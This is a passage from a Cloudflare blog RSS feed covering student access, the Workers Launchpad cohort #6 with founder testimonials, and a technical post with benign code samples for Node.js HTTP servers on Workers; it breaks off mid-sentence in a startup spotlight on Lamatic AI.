    <p>While our first offering is primarily for institutions in the US, we’re working on expanding support for our students in other countries and plan to add additional higher education domain names after launch. If you’re at an educational institution outside of the United States, <a href="http://www.cloudflare.com/students"><u>please reach out to us and apply</u></a> for your educational/academic domain to be added. We’ll let you know as soon as it becomes available in your region. Check our <a href="http://www.cloudflare.com/students"><u>Cloudflare for Students</u></a> page for updates and keep an eye out for emails if you have an account with a newly supported domain.</p><p>Whether you're gearing up for your first hackathon, launching a side project, or looking to build the next big thing, you can get started today with free access and join a global developer community already building on Cloudflare.</p><p>Get started by <a href="http://www.cloudflare.com/students"><u>signing up or requesting access today</u></a>.  </p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3GaE9EPpIIv2YX6Gewps0y/75b0bb5e4f4f71b3ec5bb945c8b9a536/BLOG-2948_7.png" />
          </figure><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Serverless]]></category>
            <guid isPermaLink="false">4ENCSXn82EzWHyNI8IGlGL</guid>
            <dc:creator>Veronica Marin</dc:creator>
            <dc:creator>Howard Huang</dc:creator>
        </item>
        <item>
            <title><![CDATA[A lookback at Workers Launchpad and a warm welcome to cohort #6]]></title>
            <link>https://blog.cloudflare.com/workers-launchpad-006/</link>
            <pubDate>Mon, 22 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ The Workers Launchpad program offers resources and mentorship for founders building on the Cloudflare network. Learn more about prior cohorts, where Launchpad alumni are today, and the participants of Cohort #6. ]]></description>
            <content:encoded><![CDATA[ <p>Imagine you have an idea for an AI application that you’re really excited about — but the cost of GPU time and complex infrastructure stops you in your tracks before you even write a line of code. This is the problem founders everywhere face: balancing high infrastructure costs with the need to innovate and scale quickly.</p><p>Our startup programs remove those barriers, so founders can focus on what matters the most: building products, finding customers, and growing a business. <a href="http://www.cloudflare.com/forstartups"><u>Cloudflare for Startups</u></a> launched in 2018 to provide enterprise-level application security and performance services to growing startups. As we built out our Developer Platform, we pivoted last year to offer founders up to $250,000 in cloud credits to build on our Developer Platform for up to one year.</p><p>During Birthday Week 2022, we announced our <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>Cloudflare Workers Launchpad Program</u></a> with an initial $1.25 billion in potential funding for startups building on Cloudflare Workers, made possible through partnerships with 26 leading venture capital (VC) firms. Within months, we expanded VC-backed funding to $2 billion.</p><p>Since 2022, we’ve welcomed 145 startups from 23 countries. These startups are solving problems across verticals such as AI and machine learning, developer tools, 3D design, cloud infrastructure, data tools, ad tech, media, logistics, finance, and other industries. We’re especially proud of the female founder representation in recent cohorts — with nearly a third of companies in Cohort #5 run by a female founder.</p><p>Participants engaged in bootcamp sessions with Cloudflare leadership and product teams, covering key topics like product pricing and scaling sales. 
Startups received hands-on design support from our Solutions Architecture team, empowering these builders to build and scale their full-stack applications on the Cloudflare network. We facilitate countless introductions across the VC network, and are happy to see funding and M&amp;A activity as these startups scale. Cloudflare also identified direct opportunities and acquired Nefeli Networks (Cohort #2) and Outerbase (Cohort #4).</p><p>Check out what Launchpad alumni have to say about their experience in the program:</p><p><a href="http://www.langbase.com"><b><u>Langbase</u></b></a><b> (Cohort #3)
</b><i>Ship hyper-personalized AI apps to any LLM, any data, any developer in seconds</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3r5wg5yas34Bc6BDFlp33C/aee74d04ac0ac463da4a6c667cd8b9b0/BLOG-2952_2.png" />
          </figure><blockquote><p><i>"For Langbase, the best part about Workers Launchpad was the incredible support from Cloudflare’s internal teams. It wasn’t just about access to infrastructure; it was the hands-on migration help, rapid feedback loops, and genuine partnership from engineers, product folks, and the broader Cloudflare community. That human support empowered us to iterate faster, solve hard problems, and truly feel like we were building something impactful together. </i></p><p><i>Langbase has quickly become one of the most powerful serverless AI clouds for building and deploying AI agents. We process 700 TB of agent memory and 1.2 billion AI agent runs a month. Langbase is an agent lab, and we’ve also launched a coding agent called </i><a href="http://www.command.new"><i><u>Command.new</u></i></a><i>, an "agent of agents" that can take your prompts and turn them into production-ready agents by provisioning infrastructure and writing the agent's code in TypeScript.</i></p><p><i>My advice for anyone joining future Workers Launchpad cohorts is to use every resource offered. Engage deeply with the Cloudflare teams, ask for feedback early and often, and be open to sharing your challenges and wins, especially in the Discord community, which is super helpful. Cloudflare listens closely to participant feedback and genuinely wants to help startups succeed. Treat it as a two-way conversation and a collaborative growth opportunity. This mindset is what unlocks the real power of the program."</i></p><p><i>-Ahmad Awais, Founder &amp; CEO of Langbase</i></p></blockquote><p><a href="http://sherpo.io"><b><u>Sherpo.io</u></b></a><b> (Cohort #4)
</b><i>AI-first no-code platform to build and sell digital content</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4a3wXoJpyWJxEe0pggamUS/848f48e1450b8b14d59fec12f7d6e2ad/BLOG-2952_3.png" />
          </figure><blockquote><p><i>“Since joining Cohort #4, we’ve exited closed beta and expanded our product suite for content creators. Today, more than 3,000 creators worldwide power their digital product stores with Sherpo, while we continue building and scaling.</i></p><p><i>We learned as much from fellow startups as from Cloudflare during office hours and sessions, and we got to meet incredible people along the way, including Cloudflare’s CSO, Stephanie Cohen.</i></p><p><i>For anyone joining, attend every session, listen closely, and ask questions—they’re incredibly valuable. Building on Workers has given us a real advantage, and the team’s pace of innovation only compounds it.”</i></p><p><i>-Giacomo Di Pinto, Co-Founder &amp; CEO of </i><a href="http://sherpo.io"><i><u>Sherpo.io</u></i></a></p></blockquote><p><a href="http://www.tightknit.ai"><b><u>Tightknit AI</u></b></a><b> (Cohort #4)
</b><i>Embedded community engagement platform built for SaaS</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6fOoareglMG6RMUanGmxXF/1fde7135f1ced8921cdb463f60d9b52b/BLOG-2952_4.png" />
          </figure><blockquote><p><i>"Beyond the cloud credits that Launchpad provided us to play with every Cloudflare product, the most important aspect of the program we found was our ability to access (and even contribute) to the product roadmap. We were able to connect with product managers and solutions architects that have helped us take our work to the next level.</i></p><p><i>We've recently passed half a million users on the platform and have started to close not just the top Saas businesses in the world, but the top AI companies in the world, including Clay, Gamma, Lindy, beehiiv, Amplitude, Mixpanel, and so many more. The best part is that 100% of application logic is still powered by Cloudflare!</i></p><p><i>The biggest piece of advice for anyone starting the cohort is attend office hours as much as you can. I can't tell you how many times we were able to unblock ourselves or even provide real product feedback/bug reports. It was amazing to meet the rest of the cohort and solve problems together that ordinary Cloudflare developers just do not face. So my advice is don't miss the office hours. They were by far the most valuable part of our experience."</i></p><p><i>-Zach Hawtof, Co-Founder &amp; CEO of </i><a href="http://tightknit.ai"><i><u>Tightknit.ai</u></i></a></p></blockquote><p><a href="http://www.renderbetter.com"><b><u>Render Better</u></b></a><b> (Cohort #4)
</b><i>Increase e-commerce revenue by automatically optimizing your site speed</i></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oVBIcUMsMgCvKMyPlbfIH/d4442571c914aded7f142b617a87f2e1/BLOG-2952_5.png" />
          </figure><blockquote><p><i>"My favorite part of the Launchpad was the community and the leaders who brought us together. The startup and product teams provided expert advice on both business and technical questions through meetings, 1-on-1s, and Discord. Many of them were former founders, so they understood what we were going through and helped us get what we needed. They were crucial in helping us get unstuck, whether we were using obscure Cloudflare features or needed connections to the right people.</i></p><p><i>I met a lot of great founders who are on the same journey and face the same struggles. Watching them grow was motivating and gave us a morale boost to keep up the fast pace a startup needs.</i></p><p><i>Since Launchpad, Render Better has scaled to 60 automated site speed optimizations, helping e-commerce sites convert 20% higher powered by Cloudflare Workers. Our growth accelerated after the program, and we're now optimizing traffic for some of the biggest e-commerce brands like PSD, Polywood, and Self-Portrait. Render Better now processes 5 billion requests each month, made possible by Cloudflare's global edge network and Workers platform.</i></p><p><i>Launchpad is truly just that: Cloudflare gives you the resources and attention to help you grow from an idea into something big. Build fast and take as much advantage of the fuel they give you to fly your startup rocket!"</i></p><p><i>-James Koshigoe, Founder &amp; CEO of Render Better</i></p></blockquote><p>Launchpad is growing into more than just a program. It is a community of builders and innovators showing what is possible with Cloudflare’s network behind them. With that foundation, we are excited to introduce the next group of entrepreneurs taking the stage in Cohort #6.</p><p><b>Introducing Cohort #6</b></p><p>Before introducing Cohort #6, we want to give one last shout out to Cohort #5. As Launchpad alumni, we cannot wait to see what you achieve. 
If you didn’t get a chance to check out Cohort #5’s demo day, watch the recording <a href="https://cloudflare.tv/shows/workers-launchpad-demo-day/workers-launchpad-demo-day-cohort-5/5Zn2E0ZA"><u>here</u></a>.</p><p>With that, help us give a warm welcome to the participants of Workers Launchpad Cohort #6:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3sGY6SJyT8kdDMLjufix74/091b17ca5e7af9c6513f951ceae9de19/image-2025-12-04-12-15-45-396.png" />
          </figure><p>We’re excited to see what Cohort #6 accomplishes. Follow <a href="https://x.com/Cloudflare?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor"><u>@CloudflareDev</u></a> on X and join our Developer <a href="https://discord.com/invite/cloudflaredev"><u>Discord</u></a> to stay updated on their progress. If you’re a startup interested in joining Workers Launchpad, applications for Cohort #7 are <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>now open</u></a>.</p><table><tr><th><p><b>Company</b></p></th><th><p><b>About</b></p></th></tr><tr><td><p><a href="https://www.allegory.world"><b>Allegory</b></a></p></td><td><p>AI-Powered platform connecting impact to funding</p></td></tr><tr><td><p><a href="https://www.apgio.com"><b>Apgio</b></a></p></td><td><p>Mobile app localization platform with smart AI translations and workflow tooling</p></td></tr><tr><td><p><a href="https://www.atlas.kitchen"><b>Atlas</b></a></p></td><td><p>Building the operating system for restaurants</p></td></tr><tr><td><p><a href="https://www.bloctave.co.uk"><b>Bloctave</b></a></p></td><td><p>Configurable rights management platform with instantaneous royalty distribution</p></td></tr><tr><td><p><a href="https://www.byteable.ai"><b>Byte</b></a></p></td><td><p>AI code auditor that translates codebases into natural language</p></td></tr><tr><td><p><a href="https://www.calljmp.com"><b>Calljmp</b></a></p></td><td><p>Agentic AI backend for apps</p></td></tr><tr><td><p><a href="https://centian.ai/"><b>Centian</b></a></p></td><td><p>MCP-powered AI Agent middleware for successful and compliant operations</p></td></tr><tr><td><p><a href="https://divinci.app/"><b>Divinci AI</b></a></p></td><td><p>Release management and quality assurance for custom LLMs</p></td></tr><tr><td><p><a href="https://www.dxos.org"><b>DXOS</b></a></p></td><td><p>An extensible open-core super-app designed to be your team’s brain</p></td></tr><tr><td><p><a 
href="https://www.fidsy.com"><b>Fidsy</b></a></p></td><td><p>AI-native, code-free orchestration platform providing automated data privacy for all AI &amp; Data workflows</p></td></tr><tr><td><p><a href="https://www.fluentos.com"><b>Fluentos</b></a></p></td><td><p>Create popups your customers won’t hate</p></td></tr><tr><td><p><a href="https://www.framebird.io"><b>Framebird</b></a></p></td><td><p>Media sharing solution for creatives featuring modern galleries and client review tools</p></td></tr><tr><td><p><a href="https://www.gopersonal.com"><b>GoPersonal</b></a></p></td><td><p>AI to build, personalize, and manage your ecommerce business</p></td></tr><tr><td><p><a href="https://www.horizonexp.com"><b>Horizon</b></a></p></td><td><p>Short-form &amp; agentic experiences for apps and websites</p></td></tr><tr><td><p><a href="https://www.kenobi.ai"><b>Kenobi</b></a></p></td><td><p>Personalizing the Internet with custom web experiences</p></td></tr><tr><td><p><a href="https://www.monetization.dev/"><b>MonetizationOS</b></a></p></td><td><p>Intelligent decisioning at the edge, for monetising the human and machine web</p></td></tr><tr><td><p><a href="http://natively.dev"><b>Natively.dev</b></a></p></td><td><p>Build your dream mobile app using AI, enabling users to take directly to App Stores</p></td></tr><tr><td><p><a href="http://www.outhire.ai"><b>Outhire</b></a></p></td><td><p>AI agent automating phone screens without bias</p></td></tr><tr><td><p><a href="https://outsession.com/"><b>Outsession</b></a></p></td><td><p>Privacy-first AI tools that preserve the therapeutic relationship</p></td></tr><tr><td><p><a href="https://www.phleid.com"><b>Phleid</b></a></p></td><td><p>Direct-to-wallet mobile passes and notifications platform</p></td></tr><tr><td><p><a href="https://www.playsafe.ai"><b>PlaySafe</b></a><b> (By </b><a href="https://www.dogelabsvr.com"><b>Doge Labs</b></a><b>)</b></p></td><td><p>Makes voice-chat communities safer by detecting and blocking harassment in real 
time</p></td></tr><tr><td><p><a href="https://ploton.dev/"><b>Ploton</b></a></p></td><td><p>Help small businesses grow by building workflows through natural conversation, not complex tools</p></td></tr><tr><td><p><a href="https://www.projectkarna.com"><b>Project Karna</b></a></p></td><td><p>Multimodal, continuous identity for the post-GenAI enterprise</p></td></tr><tr><td><p><a href="https://www.schematichq.com"><b>Schematic</b></a></p></td><td><p>Simplify monetization for GTM teams, allowing them to control pricing, packaging, and entitlements without code changes</p></td></tr><tr><td><p><a href="https://www.soniclinker.com"><b>SonicLinker</b></a></p></td><td><p>Turn AI-agent visits into revenue</p></td></tr><tr><td><p><a href="https://www.suiteop.com"><b>SuiteOp</b></a></p></td><td><p>All-in-one platform to streamline hospitality operations and guest services</p></td></tr><tr><td><p><a href="https://www.suprsend.com"><b>SuprSend</b></a></p></td><td><p>Multi-channel notification engine for product and platform teams</p></td></tr><tr><td><p><a href="https://www.glacis.io/"><b>GLACIS Technologies</b></a></p></td><td><p>Building AI governance infrastructure for edge-native compliance enforcement</p></td></tr><tr><td><p><a href="https://www.zephyr-cloud.io"><b>Zephyr Cloud</b></a></p></td><td><p>Fastest way to go from idea to production</p></td></tr><tr><td><p><a href="https://www.0.email"><b>Zero Email</b></a></p></td><td><p>AI-native email client that manages your inbox, so you don't have to</p></td></tr></table><div>
  
</div><p></p> ]]></content:encoded>
            <category><![CDATA[Birthday Week]]></category>
            <category><![CDATA[Workers Launchpad]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[Cloudflare for Startups]]></category>
            <guid isPermaLink="false">3CCpu7wo3wC3GTzCk5urxU</guid>
            <dc:creator>Christopher Rotas</dc:creator>
            <dc:creator>Valentina Tejera Hernandez</dc:creator>
        </item>
        <item>
            <title><![CDATA[Bringing Node.js HTTP servers to Cloudflare Workers]]></title>
            <link>https://blog.cloudflare.com/bringing-node-js-http-servers-to-cloudflare-workers/</link>
            <pubDate>Mon, 08 Sep 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ We've implemented the node:http client and server APIs in Cloudflare Workers, allowing developers to migrate existing Node.js applications with minimal code changes. ]]></description>
            <content:encoded><![CDATA[ <p>We’re making it easier to run your Node.js applications on <a href="https://www.cloudflare.com/developer-platform/products/workers/"><u>Cloudflare Workers </u></a>by adding support for the <code>node:http</code> client and server APIs. This significant addition brings familiar Node.js HTTP interfaces to the edge, enabling you to deploy existing Express.js, Koa, and other Node.js applications globally with zero cold starts, automatic scaling, and significantly lower latency for your users — all without rewriting your codebase. Whether you're looking to migrate legacy applications to a modern serverless platform or build new ones using the APIs you already know, you can now leverage Workers' global network while maintaining your existing development patterns and frameworks.</p>
    <div>
      <h2>The Challenge: Node.js-style HTTP in a Serverless Environment</h2>
      <a href="#the-challenge-node-js-style-http-in-a-serverless-environment">
        
      </a>
    </div>
    <p>Cloudflare Workers operate in a unique <a href="https://www.cloudflare.com/learning/serverless/what-is-serverless/"><u>serverless</u></a> environment where direct TCP connections aren't available. Instead, all networking operations are fully managed by specialized services outside the Workers runtime itself — systems like our <a href="https://blog.cloudflare.com/introducing-oxy/"><u>Open Egress Router (OER)</u></a> and <a href="https://github.com/cloudflare/pingora"><u>Pingora</u></a> that handle connection pooling, keeping connections warm, managing egress IPs, and all the complex networking details. This means that, as a developer, you don't need to worry about TLS negotiation, connection management, or network optimization — it's all handled for you automatically.</p><p>This fully-managed approach is actually why we can't support certain Node.js APIs — these networking decisions are handled at the system level for performance and security. While this makes Workers different from traditional Node.js environments, it also makes them better for serverless computing — you get enterprise-grade networking without the complexity.</p><p>This fundamental difference required us to rethink how HTTP APIs work at the edge while maintaining compatibility with existing Node.js code patterns.</p><p>Our solution: we've implemented the core <code>node:http</code> APIs by building on top of the web-standard technologies that Workers already excel at. Here's how it works:</p>
    <div>
      <h3>HTTP Client APIs</h3>
      <a href="#http-client-apis">
        
      </a>
    </div>
    <p>The <code>node:http</code> client implementation includes the essential APIs you're familiar with:</p><ul><li><p><code>http.get()</code> - For simple GET requests</p></li><li><p><code>http.request()</code> - For full control over HTTP requests</p></li></ul><p>Our implementations of these APIs are built on top of the standard <a href="https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API"><code><u>fetch()</u></code></a> API that Workers use natively, providing excellent performance while maintaining Node.js compatibility.</p>
            <pre><code>import http from 'node:http';

export default {
  async fetch(request) {
    // Use familiar Node.js HTTP client APIs
    const { promise, resolve, reject } = Promise.withResolvers();

    const req = http.get('https://api.example.com/data', (res) =&gt; {
      let data = '';
      res.on('data', chunk =&gt; data += chunk);
      res.on('end', () =&gt; {
        resolve(new Response(data, {
          headers: { 'Content-Type': 'application/json' }
        }));
      });
    });

    req.on('error', reject);

    return promise;
  }
};</code></pre>
            
    <div>
      <h3>What's Supported</h3>
      <a href="#whats-supported">
        
      </a>
    </div>
    <ul><li><p>Standard HTTP methods (GET, POST, PUT, DELETE, etc.)</p></li><li><p>Request and response headers</p></li><li><p>Request and response bodies</p></li><li><p>Streaming responses</p></li><li><p>Basic authentication</p></li></ul>
    <div>
      <h3>Current Limitations</h3>
      <a href="#current-limitations">
        
      </a>
    </div>
    <ul><li><p>The <a href="https://nodejs.org/api/http.html#class-httpagent"><code><u>Agent</u></code></a> API is provided but operates as a no-op.</p></li><li><p><a href="https://nodejs.org/docs/v22.19.0/api/http.html#responseaddtrailersheaders"><u>Trailers</u></a>, <a href="https://nodejs.org/docs/v22.19.0/api/http.html#responsewriteearlyhintshints-callback"><u>early hints</u></a>, and <a href="https://nodejs.org/docs/v22.19.0/api/http.html#event-continue"><u>1xx responses</u></a> are not supported.</p></li><li><p>TLS-specific options are not supported (Workers handle TLS automatically).</p></li></ul>
    <div>
      <h2>HTTP Server APIs</h2>
      <a href="#http-server-apis">
        
      </a>
    </div>
    <p>The server-side implementation is where things get particularly interesting. Since Workers can't create traditional TCP servers listening on specific ports, we've created a bridge system that connects Node.js-style servers to the Workers request handling model.</p><p>When you create an HTTP server and call <code>listen(port)</code>, instead of opening a TCP socket, the server is registered in an internal table within your Worker. This internal table acts as a bridge between <code>http.createServer</code> executions and incoming fetch requests, using the port number as the identifier.</p><p>You then use one of two methods to bridge incoming Worker requests to your Node.js-style server.</p>
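<p>Conceptually, this internal table behaves like a small port-keyed map. The sketch below is our own illustration of the idea, not the actual runtime implementation, and the <code>registerServer</code> and <code>dispatchToServer</code> names are hypothetical:</p>

```javascript
// Illustrative model of the bridge described above -- not real workerd
// internals. server.listen(port) conceptually records a handler in a
// table, and each incoming request is dispatched by port number.
const serverTable = new Map();

// What listen(port) conceptually does inside a Worker
function registerServer(port, handler) {
  serverTable.set(port, handler);
}

// What handleAsNodeRequest(port, request) conceptually does
function dispatchToServer(port, request) {
  const handler = serverTable.get(port);
  if (handler === undefined) {
    throw new Error('no server registered on port ' + port);
  }
  return handler(request);
}

// Register a trivial handler on "port" 8080 and dispatch a request to it
registerServer(8080, function (request) {
  return 'handled ' + request;
});
```

<p>No socket is ever opened: the port number is purely a lookup key that connects <code>listen()</code> calls to incoming requests.</p>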
    <div>
      <h3>Manual Integration with <code>handleAsNodeRequest</code></h3>
      <a href="#manual-integration-with-handleasnoderequest">
        
      </a>
    </div>
    <p>This approach gives you the flexibility to integrate Node.js HTTP servers with other Worker features, and allows you to have multiple handlers in your default <a href="https://developers.cloudflare.com/workers/runtime-apis/bindings/service-bindings/rpc/"><u>entrypoint</u></a> such as <code>fetch</code>, <code>scheduled</code>, <code>queue</code>, etc.</p>
            <pre><code>import { handleAsNodeRequest } from 'cloudflare:node';
import { createServer } from 'node:http';

// Create a traditional Node.js HTTP server
const server = createServer((req, res) =&gt; {
  res.writeHead(200, { 'Content-Type': 'text/plain' });
  res.end('Hello from Node.js HTTP server!');
});

// Register the server (doesn't actually bind to port 8080)
server.listen(8080);

// Bridge from Workers fetch handler to Node.js server
export default {
  async fetch(request) {
    // You can add custom logic here before forwarding
    if (request.url.includes('/admin')) {
      return new Response('Admin access', { status: 403 });
    }

    // Forward to the Node.js server
    return handleAsNodeRequest(8080, request);
  },
  async queue(batch, env, ctx) {
    for (const msg of batch.messages) {
      msg.retry();
    }
  },
  async scheduled(controller, env, ctx) {
    ctx.waitUntil(doSomeTaskOnSchedule(controller));
  },
};</code></pre>
            <p>This approach is perfect when you need to:</p><ul><li><p>Integrate with other Workers features like <a href="https://www.cloudflare.com/developer-platform/products/workers-kv/"><u>KV</u></a>, <a href="https://www.cloudflare.com/developer-platform/products/durable-objects/"><u>Durable Objects</u></a>, or <a href="https://www.cloudflare.com/developer-platform/products/r2/"><u>R2</u></a></p></li><li><p>Handle some routes differently while delegating others to the Node.js server</p></li><li><p>Apply custom middleware or request processing</p></li></ul>
    <div>
      <h3>Automatic Integration with <code>httpServerHandler</code></h3>
      <a href="#automatic-integration-with-httpserverhandler">
        
      </a>
    </div>
    <p>For use cases where you want to integrate a Node.js HTTP server without any additional features or complexity, you can use the <code>httpServerHandler</code> function. This function automatically handles the integration for you. This solution is ideal for applications that don’t need Workers-specific features.</p>
            <pre><code>import { httpServerHandler } from 'cloudflare:node';
import { createServer } from 'node:http';

// Create your Node.js HTTP server
const server = createServer((req, res) =&gt; {
  if (req.url === '/') {
    res.writeHead(200, { 'Content-Type': 'text/html' });
    res.end('&lt;h1&gt;Welcome to my Node.js app on Workers!&lt;/h1&gt;');
  } else if (req.url === '/api/status') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    res.end(JSON.stringify({ status: 'ok', timestamp: Date.now() }));
  } else {
    res.writeHead(404, { 'Content-Type': 'text/plain' });
    res.end('Not Found');
  }
});

server.listen(8080);

// Export the server as a Workers handler
export default httpServerHandler({ port: 8080 });
// Or you can simply pass the http.Server instance directly:
// export default httpServerHandler(server);</code></pre>
            
    <div>
      <h2><a href="https://expressjs.com/"><u>Express.js</u></a>, <a href="https://koajs.com/"><u>Koa.js</u></a> and Framework Compatibility</h2>
      <a href="#and-framework-compatibility">
        
      </a>
    </div>
    <p>These HTTP APIs open the door to running popular Node.js frameworks like Express.js on Workers. If any of the middlewares for these frameworks don’t work as expected, please <a href="https://github.com/cloudflare/workerd/issues"><u>open an issue</u></a> in the Cloudflare Workers repository.</p>
            <pre><code>import { httpServerHandler } from 'cloudflare:node';
import express from 'express';

const app = express();

app.get('/', (req, res) =&gt; {
  res.json({ message: 'Express.js running on Cloudflare Workers!' });
});

app.get('/api/users/:id', (req, res) =&gt; {
  res.json({
    id: req.params.id,
    name: 'User ' + req.params.id
  });
});

app.listen(3000);
export default httpServerHandler({ port: 3000 });
// Or you can simply pass the http.Server instance directly:
// export default httpServerHandler(app.listen(3000));</code></pre>
            <p>In addition to <a href="https://expressjs.com"><u>Express.js</u></a>, <a href="https://koajs.com/"><u>Koa.js</u></a> is also supported:</p>
            <pre><code>import Koa from 'koa';
import { httpServerHandler } from 'cloudflare:node';

const app = new Koa();

app.use(async ctx =&gt; {
  ctx.body = 'Hello World';
});

app.listen(8080);

export default httpServerHandler({ port: 8080 });</code></pre>
            
    <div>
      <h2>Getting started with serverless Node.js applications</h2>
      <a href="#getting-started-with-serverless-applications">
        
      </a>
    </div>
    <p>The <code>node:http</code> and <code>node:https</code> APIs are available in Workers with Node.js compatibility enabled using the <a href="https://developers.cloudflare.com/workers/configuration/compatibility-dates/#nodejs-compatibility-flag"><code><u>nodejs_compat</u></code></a> compatibility flag with a compatibility date later than 2025-08-15.</p><p>The addition of <code>node:http</code> support brings us closer to our goal of making Cloudflare Workers the best platform for running JavaScript at the edge, whether you're building new applications or migrating existing ones.</p><a href="https://deploy.workers.cloudflare.com/?url=https://github.com/cloudflare/templates/tree/main/nodejs-http-server-template"><img src="https://deploy.workers.cloudflare.com/button" /></a>
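<p>For reference, a minimal <code>wrangler.toml</code> sketch with the flag enabled might look like the following (the <code>name</code>, <code>main</code>, and exact date below are placeholders):</p>

```toml
# Illustrative wrangler.toml; adjust name and main for your project
name = "node-http-worker"
main = "src/index.js"
compatibility_date = "2025-09-01"        # any date after 2025-08-15
compatibility_flags = ["nodejs_compat"]
```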
<p></p><p>Ready to try it out? <a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/"><u>Enable Node.js compatibility</u></a> in your Worker and start exploring the possibilities of familiar<a href="https://developers.cloudflare.com/workers/runtime-apis/nodejs/http/"><u> HTTP APIs at the edge</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Node.js]]></category>
            <category><![CDATA[Cloudflare Workers]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Serverless]]></category>
            <category><![CDATA[Servers]]></category>
            <guid isPermaLink="false">k5sD9WGL8BsJPuqsJj6Fn</guid>
            <dc:creator>Yagiz Nizipli</dc:creator>
            <dc:creator>James M Snell</dc:creator>
        </item>
        <item>
            <title><![CDATA[Startup spotlight: building AI agents and accelerating innovation with Cohort #5]]></title>
            <link>https://blog.cloudflare.com/ai-agents-and-innovation-with-launchpad-cohort5/</link>
            <pubDate>Fri, 11 Apr 2025 14:00:00 GMT</pubDate>
            <description><![CDATA[ Discover how developers are using Cloudflare to scale AI workloads and streamline automation, what participants in Workers Launchpad Cohort #4 have built, and the startups participating in Cohort #5 ]]></description>
            <content:encoded><![CDATA[ <p>With quick access to flexible infrastructure and innovative AI tools, startups are able to deploy production-ready applications with speed and efficiency. Cloudflare plays a pivotal role for countless applications, empowering founders and engineering teams to build, scale, and accelerate their innovations with ease — and without the burden of technical overhead. And when applicable, initiatives like our <a href="http://www.cloudflare.com/forstartups"><u>Startup Program</u></a> and <a href="http://www.cloudflare.com/lp/workers-launchpad"><u>Workers Launchpad</u></a> offer the tooling and resources that further fuel these ambitious projects.</p><p>Cloudflare recently announced<b> </b><a href="https://blog.cloudflare.com/build-ai-agents-on-cloudflare/"><b><u>AI agents</u></b></a>, allowing developers to leverage Cloudflare to deploy <a href="https://www.cloudflare.com/learning/ai/what-is-agentic-ai/">agents</a> to complete autonomous tasks. We’re already seeing some great examples of startups leveraging Cloudflare as their platform of choice to invest in building their agent infrastructure. Read on to see how a few up-and-coming startups are building their AI agent platforms, powered by Cloudflare.</p>
    <div>
      <h2>Lamatic AI built a scalable AI agent platform using Workers for Platform</h2>
      <a href="#lamatic-ai-built-a-scalable-ai-agent-platform-using-workers-for-platform">
        
      </a>
    </div>
    <p>Founded in 2023, Lamatic.ai empowers SaaS startups to seamlessly integrate intelligent AI agents into their products. Lamatic.ai simplifies the deployment of AI agents by offering a fully managed lifecycle with scalability and security in mind. SaaS providers have been leveraging Lamatic to <a href="https://www.cloudflare.com/learning/cloud/how-to-replatform-applications/">replatform</a> their AI workflows via a no-code visual builder to reduce technical debt and ship products faster. Designed for high availability, scalability, and low latency, Lamatic’s architecture enables developers to build AI-driven applications that remain performant under heavy load. After acquiring a large number of users in a short time on Product Hunt, Lamatic identified real interest in solving complex problems with AI agents, and the team knew they needed to build a solution with scalability and performance in mind.</p><p>Cloudflare plays a key role in supporting Lamatic’s growth. Powered by Cloudflare <a href="https://workers.cloudflare.com/"><b><u>Workers</u></b></a><b>, </b>Lamatic ensures requests are processed closer to end users, minimizing latency while offloading computational strain from centralized servers. In just a few months, Lamatic.ai has efficiently scaled to over three million serverless requests per month, supporting over 1,000 customers — all managed by a lean three-person team.</p><p>Customers design their Agent Flows through a no-code visual builder, which generates an interoperable YAML configuration. Sensitive credentials such as API keys and model access tokens are securely encrypted and stored in Workers KV, ensuring they are only decrypted at runtime for enhanced security. All YAML configurations are then compiled into a Workers-compatible JavaScript bundle. 
When a project is deployed, Lamatic orchestrates critical components like sync jobs for scheduled data ETL operations and incoming webhooks to handle event-driven workflows via <b>Cloudflare </b><a href="https://developers.cloudflare.com/queues/"><b><u>Queues</u></b></a>. Once deployed, the project is fully operational as a Cloudflare Worker with an exposed API endpoint, allowing customers to integrate AI-powered automation directly into their applications with minimal friction.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YUQpvrLjYaee5RJq4TRW3/8d2db69af7607b038855a0f4f1e27dc6/1.png" />
          </figure><p>To scale out their platform, Lamatic.ai built their architecture isolating serverless and AI logic on a per-customer basis. Rather than batching requests into a centralized cluster, Lamatic.ai distributes workloads across Cloudflare’s global network, ensuring each customer and endpoint is served by its own Worker executing dedicated logic. This per-customer deployment model — enabled by <a href="https://developers.cloudflare.com/cloudflare-for-platforms/workers-for-platforms/"><b><u>Workers for Platforms</u></b></a><b> </b>— allows Lamatic.ai to deliver customer-specific serverless functions at scale, and reduces technical overhead as they onboard additional customers. Each customer gets a dedicated Worker whose request and rate limits are enabled based on their level of subscription. </p><p>Beyond request processing, Lamatic uses <b>Cloudflare </b><a href="https://developers.cloudflare.com/kv/"><b><u>Workers KV</u></b></a> as a distributed config store to ensure high availability and security. All values are encrypted at rest with <a href="https://en.wikipedia.org/wiki/Galois/Counter_Mode"><u>AES-256-GCM</u></a> and decrypted only at runtime, keeping operations both secure and low-latency. Tokens and user credentials are encrypted and stored in the database and KV. </p><p>To further enhance performance, Cloudflare <b>Queues</b> plays a key role in orchestrating task completion. Lamatic uses Queues to offload work from Workers requests, and handle tasks such as 